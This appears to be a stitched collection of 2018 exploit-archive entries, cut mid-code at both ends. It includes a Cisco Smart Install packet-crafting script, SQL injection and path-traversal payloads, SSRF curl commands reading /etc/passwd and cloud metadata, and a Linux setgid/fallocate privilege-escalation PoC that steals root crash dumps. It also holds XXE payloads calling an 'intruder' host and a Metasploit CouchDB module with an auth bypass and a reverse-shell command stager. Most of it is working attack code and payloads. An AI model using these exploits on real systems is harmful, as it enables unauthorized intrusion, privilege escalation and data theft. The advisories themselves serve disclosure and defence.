return struct.pack(t_fmt, t) + struct.pack(l_fmt, len(v)) + v
def send_packet(sock, packet):
sock.send(packet)
def receive(sock):
return sock.recv()
if __name__ == "__main__":
print "[*] Connecting to Smart Install Client ", options.target, "port", options.port
con = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
con.connect((options.target, options.port))
payload = 'BBBB' * 44 shellcode = 'D' * 2048
data = 'A' * 36 + struct.pack('!I', len(payload) + len(shellcode) + 40) + payload
tlv_1 = craft_tlv(0x00000001, data) tlv_2 = shellcode
hdr = '\x00\x00\x00\x01' # msg_from
hdr += '\x00\x00\x00\x01' # version
hdr += '\x00\x00\x00\x07' # msg_hdr_type
hdr += struct.pack('>I', len(data)) # data_length
pkt = hdr + tlv_1 + tlv_2
print "[*] Send a malicious packet"
send_packet(con, pkt)
# Exploit Title: Cobub Razor 0.8.0 SQL injection Vulnerability
# Date: 2018-04-16
# Exploit Author: Kyhvedn(yinfengwuyueyi@163.com、kyhvedn@5ecurity.cn)
# Vendor Homepage: http://www.cobub.com/
# Software Link: https://github.com/cobub/razor
# Version: 0.8.0
# CVE : CVE-2018-8057
The string of the 'channel_name' and 'platform' parameter transmission is completely without check and filter,so if the string is passed, it will lead to the existence of SQL injection vulnerability,This could result in full information disclosure.
Code source:
/application/controllers/manage/channel.php at line 75-95
The SQL injection type: error-based and AND/OR time-based blind
Parameter: channel_name,platform
PoC:
http://localhost/index.php?/manage/channel/addchannel
POST data:
1.channel_name=test" AND (SELECT 1700 FROM(SELECT COUNT(*),CONCAT(0x7171706b71,(SELECT (ELT(1700=1700,1))),0x71786a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- JQon&platform=1
2.channel_name=test" AND SLEEP(5)-- NklJ&platform=1
SEC Consult Vulnerability Lab Security Advisory < 20180712-0 >
=======================================================================
title: Remote Code Execution & Local File Disclosure
product: Zeta Producer Desktop CMS
vulnerable version: <=14.2.0
fixed version: >=14.2.1
CVE number: CVE-2018-13981, CVE-2018-13980
impact: critical
homepage: https://www.zeta-producer.com
found: 2017-11-25
by: P. Morimoto (Office Bangkok)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"With Zeta Producer, the website builder and online shop system for Windows,
you can create and manage your website locally, on your computer.
Get without expertise in 3 steps to your own homepage: select design,
paste content, publish website. Finished."
Source: https://www.zeta-producer.com/de/index.html
Business recommendation:
------------------------
The vendor provides a patched version which should be installed immediately.
Users of the product also need to verify that the affected widgets are updated in
the corresponding website project! It could be necessary to rebuild the whole project
or copy the new widgets to the website projects. For further information consult the
vendor.
Furthermore, an in-depth security analysis is highly advised, as the software may be
affected from further security issues.
Vulnerability overview/description:
-----------------------------------
1) Remote Code Execution (CVE-2018-13981)
The email contact functionality of the widget "formmailer" can upload files
to the server but if the user uploads a PHP script with a .php extension
then the server will rename it to .phps to prevent PHP code execution.
However, the attacker can upload .php5 or .phtml to the server without any
restriction. These alternative file extensions can be executed as PHP code.
Furthermore, the server will create a folder to store the files, with a
random name using PHP's "uniqid" function.
Unfortunately, if the server permits directory listing, the attacker
can easily browse to the uploaded PHP script. If no directory listing is
enabled the attacker can still bruteforce the random name to gain remote
code execution via the PHP script as well. Testing on a local server it
took about 20 seconds to brute force the random name. This attack will
be slower over the Internet but it is still feasible.
Also, if the user runs the Zeta Producer Desktop CMS GUI client locally,
they are also vulnerable because the web server will be running on TCP port 9153.
The root cause is in the widget "formmailer" which is enabled by default.
The following files are affected:
- /assets/php/formmailer/SendEmail.php
- /assets/php/formmailer/functions.php
2) Local File Disclosure (CVE-2018-13980)
If the user enables the widget "filebrowser" on Zeta Producer Desktop CMS an
unauthenticated attacker can read local files by exploiting path traversal issues.
The following files are affected:
- /assets/php/filebrowser/filebrowser.main.php
Proof of concept:
-----------------
1) Remote Code Execution (CVE-2018-13981)
The following python script can be used to exploit the chain of vulnerabilities.
[.. code has been removed to prevent misuses ..]
When the script is executed, a PHP script (shell) will be uploaded automatically.
# $ python exploit.py
# [+] injecting webshell to http://target/assets/php/formmailer/SendEmail.php
#
# 5a1a5bc991afe
# 5a1a5bc99453a
# 10812
# [*] Found : http://target/assets/php/formmailer/upload_5a1a5bc992772/sectest.php5
# uid=33(www-data) gid=33(www-data) groups=33(www-data)
2) Local File Disclosure (CVE-2018-13980)
The parameter "file" in the "filebrowser.main.php" script can be exploited to read
arbitrary files from the OS with the privileges of the web server user.
Any unauthenticated user can exploit this issue!
http://target/assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc/passwd&do=download
http://target/assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc&do=list
Vulnerable / tested versions:
-----------------------------
The following versions have been tested which were the latest version available
at the time of the test:
Zeta Producer Desktop CMS 14.1.0
Zeta Producer Desktop CMS 14.2.0
Source:
- https://www.zeta-producer.com/de/download.html
- https://github.com/ZetaSoftware/zeta-producer-content/
Vendor contact timeline:
------------------------
2017-11-29: Contacting vendor through info@zeta-producer.com and various other
email addresses from the website. No reply.
2017-12-13: Contacting vendor again, extending email address list, no reply
2018-01-09: Contacting vendor again
2018-01-10: Vendor replies, requests transmission of security advisory
2018-01-10: Sending unencrypted security advisory
2018-07-02: There was no feedback from the vendor but the version 14.2.1 fixed
the reported vulnerabilities.
2018-07-12: Public advisory release.
Solution:
---------
Upgrade to version 14.2.1 or newer. See the vendor's download page:
https://www.zeta-producer.com/de/download.html
Users of the product also need to verify that the affected widgets are updated in
the corresponding website project! It could be necessary to rebuild the whole project
or copy the new widgets to the website projects. For further information consult the
vendor.
Workaround:
-----------
Remove "formmailer" and "filebrowser" widgets.
Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
# Exploit Title: Responsive filemanager 9.13.1 - Server-Side Request Forgery
# Date: 2018-07-29
# Exploit Author: GUIA BRAHIM FOUAD
# Vendor Homepage: http://responsivefilemanager.com/
# Software Link: https://github.com/trippo/ResponsiveFilemanager/releases/download/v9.13.1/responsive_filemanager.zip
# Version: 9.13.1
# Tested on: responsive filemanager version: 9.13.1, php version: 7.0
# CVE : CVE-2018-14728
# PoC
curl 'http://localhost/filemanager/upload.php' --data 'fldr=&url=file:///etc/passwd'
curl 'http://localhost/filemanager/upload.php' --data 'fldr=&url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cvictime@site.com%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a'
curl 'http://localhost/filemanager/upload.php' --data 'fldr=&url=http://169.254.169.254/openstack'
/*
Note: I am both sending this bug report to security@kernel.org and filing it in
the Ubuntu bugtracker because I can't tell whether this counts as a kernel bug
or as a Ubuntu bug. You may wish to talk to each other to determine the best
place to fix this.
I noticed halfdog's old writeup at
https://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/
, describing essentially the following behavior in combination with a
trick for then writing to the resulting file without triggering the
killpriv logic:
=============
user@debian:~/sgid_demo$ sudo mkdir -m03777 dir
user@debian:~/sgid_demo$ cat > demo.c
#include <fcntl.h>
int main(void) { open("dir/file", O_RDONLY|O_CREAT, 02755); }
user@debian:~/sgid_demo$ gcc -o demo demo.c
user@debian:~/sgid_demo$ ./demo
user@debian:~/sgid_demo$ ls -l dir/file
-rwxr-sr-x 1 user root 0 Jun 25 22:03 dir/file
=============
Two patches for this were proposed on LKML back then:
"[PATCH 1/2] fs: Check f_cred instead of current's creds in
should_remove_suid()"
https://lore.kernel.org/lkml/9318903980969a0e378dab2de4d803397adcd3cc.1485377903.git.luto@kernel.org/
"[PATCH 2/2] fs: Harden against open(..., O_CREAT, 02777) in a setgid directory"
https://lore.kernel.org/lkml/826ec4aab64ec304944098d15209f8c1ae65bb29.1485377903.git.luto@kernel.org/
However, as far as I can tell, neither of them actually landed.
You can also bypass the killpriv logic with fallocate() and mmap() -
fallocate() permits resizing the file without triggering killpriv,
mmap() permits writing without triggering killpriv (the mmap part is mentioned
at
https://lore.kernel.org/lkml/CAGXu5jLu6OGkQUgqRcOyQ6DABOwZ9HX3fUQ+-zC7NjLukGKnVw@mail.gmail.com/
):
=============
user@debian:~/sgid_demo$ sudo mkdir -m03777 dir
user@debian:~/sgid_demo$ cat fallocate.c
#define _GNU_SOURCE
#include <stdlib.h>
#include <fcntl.h>
#include <err.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>
#include <string.h>
int main(void) {
int src_fd = open("/usr/bin/id", O_RDONLY);
if (src_fd == -1)
err(1, "open 2");
struct stat src_stat;
if (fstat(src_fd, &src_stat))
err(1, "fstat");
int src_len = src_stat.st_size;
char *src_mapping = mmap(NULL, src_len, PROT_READ, MAP_PRIVATE, src_fd, 0);
if (src_mapping == MAP_FAILED)
err(1, "mmap 2");
int fd = open("dir/file", O_RDWR|O_CREAT|O_EXCL, 02755);
if (fd == -1)
err(1, "open");
if (fallocate(fd, 0, 0, src_len))
err(1, "fallocate");
char *mapping = mmap(NULL, src_len, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0);
if (mapping == MAP_FAILED)
err(1, "mmap");
memcpy(mapping, src_mapping, src_len);
munmap(mapping, src_len);
close(fd);
close(src_fd);
execl("./dir/file", "id", NULL);
err(1, "execl");
}
user@debian:~/sgid_demo$ gcc -o fallocate fallocate.c
user@debian:~/sgid_demo$ ./fallocate
uid=1000(user) gid=1000(user) egid=0(root)
groups=0(root),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),112(lpadmin),116(scanner),121(wireshark),1000(user)
=============
sys_copy_file_range() also looks as if it bypasses killpriv on
supported filesystems, but I haven't tested that one so far.
On Ubuntu 18.04 (bionic), /var/crash is mode 03777, group "whoopsie", and
contains group-readable crashdumps in some custom format, so you can use this
issue to steal other users' crashdumps:
=============
user@ubuntu-18-04-vm:~$ ls -l /var/crash
total 296
-rw-r----- 1 user whoopsie 16527 Jun 25 22:27 _usr_bin_apport-unpack.1000.crash
-rw-r----- 1 root whoopsie 50706 Jun 25 21:51 _usr_bin_id.0.crash
-rw-r----- 1 user whoopsie 51842 Jun 25 21:42 _usr_bin_id.1000.crash
-rw-r----- 1 user whoopsie 152095 Jun 25 21:43 _usr_bin_strace.1000.crash
-rw-r----- 1 root whoopsie 18765 Jun 26 00:42 _usr_bin_xattr.0.crash
user@ubuntu-18-04-vm:~$ cat /var/crash/_usr_bin_id.0.crash
cat: /var/crash/_usr_bin_id.0.crash: Permission denied
user@ubuntu-18-04-vm:~$ cat fallocate.c
*/
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <err.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>
#include <string.h>
int main(int argc, char **argv) {
if (argc != 2) {
printf("usage: ./fallocate <file_to_read>");
return 1;
}
int src_fd = open("/bin/cat", O_RDONLY);
if (src_fd == -1)
err(1, "open 2");
struct stat src_stat;
if (fstat(src_fd, &src_stat))
err(1, "fstat");
int src_len = src_stat.st_size;
char *src_mapping = mmap(NULL, src_len, PROT_READ, MAP_PRIVATE, src_fd, 0);
if (src_mapping == MAP_FAILED)
err(1, "mmap 2");
unlink("/var/crash/privileged_cat"); /* in case we've already run before */
int fd = open("/var/crash/privileged_cat", O_RDWR|O_CREAT|O_EXCL, 02755);
if (fd == -1)
err(1, "open");
if (fallocate(fd, 0, 0, src_len))
err(1, "fallocate");
char *mapping = mmap(NULL, src_len, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0);
if (mapping == MAP_FAILED)
err(1, "mmap");
memcpy(mapping, src_mapping, src_len);
munmap(mapping, src_len);
close(fd);
execl("/var/crash/privileged_cat", "cat", argv[1], NULL);
err(1, "execl");
}
/*
user@ubuntu-18-04-vm:~$ gcc -o fallocate fallocate.c
user@ubuntu-18-04-vm:~$ ./fallocate /var/crash/_usr_bin_id.0.crash > /var/crash/_usr_bin_id.0.crash.stolen
user@ubuntu-18-04-vm:~$ ls -l /var/crash
total 384
-rwxr-sr-x 1 user whoopsie 35064 Jul 3 19:22 privileged_cat
-rw-r----- 1 user whoopsie 16527 Jun 25 22:27 _usr_bin_apport-unpack.1000.crash
-rw-r----- 1 root whoopsie 50706 Jun 25 21:51 _usr_bin_id.0.crash
-rw-r--r-- 1 user whoopsie 50706 Jul 3 19:22 _usr_bin_id.0.crash.stolen
-rw-r----- 1 user whoopsie 51842 Jun 25 21:42 _usr_bin_id.1000.crash
-rw-r----- 1 user whoopsie 152095 Jun 25 21:43 _usr_bin_strace.1000.crash
-rw-r----- 1 root whoopsie 18765 Jun 26 00:42 _usr_bin_xattr.0.crash
user@ubuntu-18-04-vm:~$ mkdir root_crash_unpacked
user@ubuntu-18-04-vm:~$ # work around bug in apport-unpack
user@ubuntu-18-04-vm:~$ sed -i 's|^UserGroups: $|UserGroups: 0|' /var/crash/_usr_bin_id.0.crash.stolen
user@ubuntu-18-04-vm:~$ apport-unpack /var/crash/_usr_bin_id.0.crash.stolen root_crash_unpacked/
user@ubuntu-18-04-vm:~$ file root_crash_unpacked/CoreDump
root_crash_unpacked/CoreDump: ELF 64-bit LSB core file x86-64, version 1 (SYSV), SVR4-style, from 'id', real uid: 0, effective uid: 0, real gid: 0, effective gid: 0, execfn: '/usr/bin/id', platform: 'x86_64'
*/
Title: Vulnerability in VelotiSmart Wifi - Directory Traversal
Date: 12-07-2018
Scope: Directory Traversal
Platforms: Unix
Author: Miguel Mendez Z
Vendor: VelotiSmart
Version: B380
CVE: CVE-2018–14064
Vulnerability description
-------------------------
- The vulnerability that affects the device is LFI type in the uc-http service 1.0.0. What allows to obtain information of configurations, wireless scanned networks, sensitive directories, etc. Of the device.
Vulnerable variable:
http://domain:80/../../etc/passwd
Exploit link:
https://github.com/s1kr10s/ExploitVelotiSmart
Poc:
https://medium.com/@s1kr10s/velotismart-0day-ca5056bcdcac
Details
================
Software: Fortify SSC (Software Security Center)
Version: 17.10, 17.20 & 18.10
Homepage: https://www.microfocus.com
Advisory report: https://github.com/alt3kx/CVE-2018-12463
CVE: CVE-2018-12463 at https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12463
CVSS: HIGH (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)
CWE-611, CWE-918
Description
================
Out-of-Band XML External Entity (OOB-XXE) An XML External Entity attack is a type of attack against an application that parses XML input.
This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of
confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts.
Vulnerability
================
XML external entity (XXE) vulnerability in /ssc/fm-ws/services in Fortify Software Security Center (SSC) 17.10, 17.20 & 18.10 allows remote unauthenticated users to read arbitrary
files or conduct server-side request forgery (SSRF) attacks via a crafted DTD in an XML request.
Proof of concept Exploit
==========================
The offending POST method below:
POST /ssc/fm-ws/services HTTP/1.1
Accept-Encoding: gzip, deflate
SOAPAction: ""
Accept: text/xml
Content-Type: text/xml; charset=UTF-8; text/html;
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Java/1.8.0_121
Host: fortifyserver.com
Connection: close
Content-Length: 1765
<?xml version='1.0' encoding='UTF-8'?>
<!Your payload here "http://intuder.IP.here/alex1.dtd"> <-- HERE!!!
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<wsse:Security xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" soapenv:mustUnderstand="1">
<wsu:Timestamp xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd" wsu:Id="Timestamp-2">
<wsu:Created>2018-05-24T14:27:02.619Z</wsu:Created>
<wsu:Expires>2018-05-24T14:32:02.619Z</wsu:Expires>
</wsu:Timestamp>
<wsse:UsernameToken xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd" wsu:Id="UsernameToken-1">
<wsse:Username>XXXXXXX</wsse:Username>
<wsse:Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordText">XXXXXXXXXXX</wsse:Password>
</wsse:UsernameToken>
</wsse:Security>
</soapenv:Header>
<soapenv:Body>
<ns3:GetAuthenticationTokenRequest xmlns:ns3="http://www.fortify.com/schema/fws" xmlns:ns6="xmlns://www.fortify.com/schema/issuemanagement"
xmlns:ns5="xmlns://www.fortifysoftware.com/schema/activitytemplate" xmlns:ns8="xmlns://www.fortifysoftware.com/schema/seed"
xmlns:ns7="xmlns://www.fortifysoftware.com/schema/runtime"
xmlns:ns9="xmlns://www.fortify.com/schema/attachments"
xmlns:ns2="xmlns://www.fortify.com/schema/audit"
xmlns:ns4="xmlns://www.fortifysoftware.com/schema/wsTypes"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<ns3:TokenType>AnalysisUploadToken</ns3:TokenType>
</ns3:GetAuthenticationTokenRequest>
</soapenv:Body>
</soapenv:Envelope>
Note: As remark that is not necessary to be used the credentials or any authentication, the POST method above was extracted using Burp Suite to know the
exact API path and data sending to the server.
RedTeam Vector (1): Using “Transitional” payload, connection to HTTP server (intruder). it works!
POST /ssc/fm-ws/services HTTP/1.1
Accept-Encoding: gzip, deflate
SOAPAction: ""
Accept: text/xml
Content-Type: text/xml; charset=UTF-8; text/html;
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Java/1.8.0_121
Host: fortifyserver.com
Connection: close
Content-Length: 1789
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://intruder.ip.here/alex1.dtd">
[../snip]
RedTeam Vector (2): Classic "OOB XXE" payload, connection to HTTP server (intruder), it works!
POST /ssc/fm-ws/services HTTP/1.1
Accept-Encoding: gzip, deflate
SOAPAction: ""
Accept: text/xml
Content-Type: text/xml; charset=UTF-8
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Java/1.8.0_121
Host: fortifyserver.com
Connection: close
Content-Length: 1750
<?xml version='1.0' encoding='UTF-8'?>
<!DOCTYPE data SYSTEM "http://intruder.ip.here/alex1.dtd">
<data>&send;</data>
[../snip]
RedTeam Vector (3): FTP payload with ruby FTP server emulator
POST /ssc/fm-ws/services HTTP/1.1
Accept-Encoding: gzip, deflate
SOAPAction: ""
Accept: text/xml
Content-Type: text/xml; charset=UTF-8
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Java/1.8.0_121
Host: fortifyserver.com
Connection: close
Content-Length: 1769
<?xml version='1.0' encoding='UTF-8'?>
<!DOCTYPE data SYSTEM "ftp://intruder.ip.here:2121">
[../snip]
RedTeam Vector (4): FTP payloads with FTP python server
POST /ssc/fm-ws/services HTTP/1.1
Accept-Encoding: gzip, deflate
SOAPAction: ""
Accept: text/xml
Content-Type: text/xml; charset=UTF-8
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Java/1.8.0_121
Host: fortifyserver.com
Connection: close
Content-Length: 1769
<?xml version='1.0' encoding='UTF-8'?>
<!DOCTYPE data SYSTEM "ftp://intruder.ip.here:2121">
[../snip]
RedTeam Vector (5): FTP payload, server compromised
POST /ssc/fm-ws/services HTTP/1.1
Accept-Encoding: gzip, deflate
SOAPAction: ""
Accept: text/xml
Content-Type: text/xml; charset=UTF-8
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Java/1.8.0_121
Host: fortifyserver.com
Connection: close
Content-Length: 1769
<?xml version='1.0' encoding='UTF-8'?>
<!DOCTYPE data SYSTEM "ftp://anonymous:anonymous@intruder.ip.here:2121/alex1.txt">
[../snip]
Mitigations
================
Provided by the vendor here:
Document ID: KM03201563
https://softwaresupport.softwaregrp.com/document/-/facetsearch/document/KM03201563
Disclosure policy
================
We believes in responsible disclosure.
Please contact us on Alex Hernandez aka alt3kx () protonmail com to acknowledge this report.
This vulnerability will be published if we do not receive a response to this report with 10 days.
Timeline
================
2018-05-24: Discovered
2018-05-25: Retest PRO environment
2018-05-31: Vendor notification, two issues found
2018-05-31: Vendor feedback received
2018-06-01: Internal communication
2018-06-01: Vendor feedback, two issues are confirmed
2018-06-05: Vendor notification, new issue found
2018-06-06: Vendor feedback, evaluating High submission
2018-06-08: Vendor feedback, High issue is confirmed
2018-06-19: Researcher, reminder sent
2018-06-22: Vendor feedback, summary of CVEs handled as official way
2018-06-26: Vendor feedback, official Hotfix for High issue available to test
2018-06-29: Researcher feedback
2018-07-02: Researcher feedback
2018-07-04: Researcher feedback, Hotfix tested on QA environment
2018-07-05: Vendor feedback
2018-07-09: Vendor feedback, final details to disclosure the CVE and official Hotfix availabe for customers.
2018-07-09: Vendor feedback, CVE and official Hotfix to be disclosure
2018-07-12: Agreements with the vendor to publish the CVE/Advisory.
2018-07-12: Public report
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Apache CouchDB Arbitrary Command Execution',
'Description' => %q{
CouchDB administrative users can configure the database server via HTTP(S).
Some of the configuration options include paths for operating system-level binaries that are subsequently launched by CouchDB.
This allows an admin user in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to execute arbitrary shell commands as the CouchDB user,
including downloading and executing scripts from the public internet.
},
'Author' => [
'Max Justicz', # CVE-2017-12635 Vulnerability discovery
'Joan Touzet', # CVE-2017-12636 Vulnerability discovery
'Green-m <greenm.xxoo[at]gmail.com>' # Metasploit module
],
'References' => [
['CVE', '2017-12636'],
['CVE', '2017-12635'],
['URL', 'https://justi.cz/security/2017/11/14/couchdb-rce-npm.html'],
['URL', 'http://docs.couchdb.org/en/latest/cve/2017-12636.html'],
['URL', 'https://lists.apache.org/thread.html/6c405bf3f8358e6314076be9f48c89a2e0ddf00539906291ebdf0c67@%3Cdev.couchdb.apache.org%3E']
],
'DisclosureDate' => 'Apr 6 2016',
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64],
'Privileged' => false,
'DefaultOptions' => {
'PAYLOAD' => 'linux/x64/shell_reverse_tcp',
'CMDSTAGER::FLAVOR' => 'curl'
},
'CmdStagerFlavor' => ['curl', 'wget'],
'Targets' => [
['Automatic', {}],
['Apache CouchDB version 1.x', {}],
['Apache CouchDB version 2.x', {}]
],
'DefaultTarget' => 0
))
register_options([
Opt::RPORT(5984),
OptString.new('URIPATH', [false, 'The URI to use for this exploit to download and execute. (default is random)']),
OptString.new('HttpUsername', [false, 'The username to login as']),
OptString.new('HttpPassword', [false, 'The password to login with'])
])
register_advanced_options([
OptInt.new('Attempts', [false, 'The number of attempts to execute the payload.']),
OptString.new('WritableDir', [true, 'Writable directory to write temporary payload on disk.', '/tmp'])
])
end
def check
get_version
version = Gem::Version.new(@version)
return CheckCode::Unknown if version.version.empty?
vprint_status "Found CouchDB version #{version}"
return CheckCode::Appears if version < Gem::Version.new('1.7.0') || version.between?(Gem::Version.new('2.0.0'), Gem::Version.new('2.1.0'))
CheckCode::Safe
end
def exploit
fail_with(Failure::Unknown, "Something went horribly wrong and we couldn't continue to exploit.") unless get_version
version = @version
vprint_good("#{peer} - Authorization bypass successful") if auth_bypass
print_status("Generating #{datastore['CMDSTAGER::FLAVOR']} command stager")
@cmdstager = generate_cmdstager(
temp: datastore['WritableDir'],
file: File.basename(cmdstager_path)
).join(';')
register_file_for_cleanup(cmdstager_path)
if !datastore['Attempts'] || datastore['Attempts'] <= 0
attempts = 1
else
attempts = datastore['Attempts']
end
attempts.times do |i|
print_status("#{peer} - The #{i + 1} time to exploit")
send_payload(version)
Rex.sleep(5)
# break if we get the shell
break if session_created?
end
end
# CVE-2017-12635
# The JSON parser differences result in behaviour that if two 'roles' keys are available in the JSON,
# the second one will be used for authorising the document write, but the first 'roles' key is used for subsequent authorization
# for the newly created user.
def auth_bypass
username = datastore['HttpUsername'] || Rex::Text.rand_text_alpha_lower(4..12)
password = datastore['HttpPassword'] || Rex::Text.rand_text_alpha_lower(4..12)
@auth = basic_auth(username, password)
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, "/_users/org.couchdb.user:#{username}"),
'method' => 'PUT',
'ctype' => 'application/json',
'data' => %({"type": "user","name": "#{username}","roles": ["_admin"],"roles": [],"password": "#{password}"})
)
if res && (res.code == 200 || res.code == 201) && res.get_json_document['ok']
return true
else
return false
end
end
def get_version
@version = nil
begin
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path),
'method' => 'GET',
'authorization' => @auth
)
rescue Rex::ConnectionError
vprint_bad("#{peer} - Connection failed")
return false
end
unless res
vprint_bad("#{peer} - No response, check if it is CouchDB. ")
return false
end
if res && res.code == 401
print_bad("#{peer} - Authentication required.")
return false
end
if res && res.code == 200
res_json = res.get_json_document
if res_json.empty?
vprint_bad("#{peer} - Cannot parse the response, seems like it's not CouchDB.")
return false
end
@version = res_json['version'] if res_json['version']
return true
end
vprint_warning("#{peer} - Version not found")
return true
end
def send_payload(version)
vprint_status("#{peer} - CouchDB version is #{version}") if version
version = Gem::Version.new(@version)
if version.version.empty?
vprint_warning("#{peer} - Cannot retrieve the version of CouchDB.")
# if target set Automatic, exploit failed.
if target == targets[0]
fail_with(Failure::NoTarget, "#{peer} - Couldn't retrieve the version automaticly, set the target manually and try again.")
elsif target == targets[1]
payload1
elsif target == targets[2]
payload2
end
elsif version < Gem::Version.new('1.7.0')
payload1
elsif version.between?(Gem::Version.new('2.0.0'), Gem::Version.new('2.1.0'))
payload2
elsif version >= Gem::Version.new('1.7.0') || Gem::Version.new('2.1.0')
fail_with(Failure::NotVulnerable, "#{peer} - The target is not vulnerable.")
end
end
# Exploit with multi requests
# payload1 is for the version of couchdb below 1.7.0
def payload1
rand_cmd1 = Rex::Text.rand_text_alpha_lower(4..12)
rand_cmd2 = Rex::Text.rand_text_alpha_lower(4..12)
rand_db = Rex::Text.rand_text_alpha_lower(4..12)
rand_doc = Rex::Text.rand_text_alpha_lower(4..12)
rand_hex = Rex::Text.rand_text_hex(32)
rand_file = "#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha_lower(8..16)}"
register_file_for_cleanup(rand_file)
send_request_cgi(
'uri' => normalize_uri(target_uri.path, "/_config/query_servers/#{rand_cmd1}"),
'method' => 'PUT',
'authorization' => @auth,
'data' => %("echo '#{@cmdstager}' > #{rand_file}")
)
send_request_cgi(
'uri' => normalize_uri(target_uri.path, "/#{rand_db}"),
'method' => 'PUT',
'authorization' => @auth
)
send_request_cgi(
'uri' => normalize_uri(target_uri.path, "/#{rand_db}/#{rand_doc}"),
'method' => 'PUT',
'authorization' => @auth,
'data' => %({"_id": "#{rand_hex}"})
)
send_request_cgi(
'uri' => normalize_uri(target_uri.path, "/#{rand_db}/_temp_view?limit=20"),
'method' => 'POST',
'authorization' => @auth,
'ctype' => 'application/json',
'data' => %({"language":"#{rand_cmd1}","map":""})
)
send_request_cgi(
'uri' => normalize_uri(target_uri.path, "/_config/query_servers/#{rand_cmd2}"),
'method' => 'PUT',
'authorization' => @auth,
'data' => %("/bin/sh #{rand_file}")
)
send_request_cgi(
'uri' => normalize_uri(target_uri.path, "/#{rand_db}/_temp_view?limit=20"),
'method' => 'POST',
'authorization' => @auth,
'ctype' => 'application/json',
'data' => %({"language":"#{rand_cmd2}","map":""})
)
end
# payload2 is for the version of couchdb below 2.1.1
def payload2
rand_cmd1 = Rex::Text.rand_text_alpha_lower(4..12)
rand_cmd2 = Rex::Text.rand_text_alpha_lower(4..12)
rand_db = Rex::Text.rand_text_alpha_lower(4..12)
rand_doc = Rex::Text.rand_text_alpha_lower(4..12)
rand_tmp = Rex::Text.rand_text_alpha_lower(4..12)
rand_hex = Rex::Text.rand_text_hex(32)
rand_file = "#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha_lower(8..16)}"
register_file_for_cleanup(rand_file)
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, "/_membership"),
'method' => 'GET',
'authorization' => @auth
)
node = res.get_json_document['all_nodes'][0]
send_request_cgi(
'uri' => normalize_uri(target_uri.path, "/_node/#{node}/_config/query_servers/#{rand_cmd1}"),
'method' => 'PUT',
'authorization' => @auth,
'data' => %("echo '#{@cmdstager}' > #{rand_file}")
)
send_request_cgi(
'uri' => normalize_uri(target_uri.path, "/#{rand_db}"),
'method' => 'PUT',
'authorization' => @auth
)
send_request_cgi(
'uri' => normalize_uri(target_uri.path, "/#{rand_db}/#{rand_doc}"),
'method' => 'PUT',
'authorization' => @auth,
'data' => %({"_id": "#{rand_hex}"})
)
send_request_cgi(
'uri' => normalize_uri(target_uri.path, "/#{rand_db}/_design/#{rand_tmp}"),
'method' => 'PUT',
'authorization' => @auth,
'ctype' => 'application/json',
'data' => %({"_id":"_design/#{rand_tmp}","views":{"#{rand_db}":{"map":""} },"language":"#{rand_cmd1}"})
)
send_request_cgi(
'uri' => normalize_uri(target_uri.path, "/_node/#{node}/_config/query_servers/#{rand_cmd2}"),
'method' => 'PUT',
'authorization' => @auth,
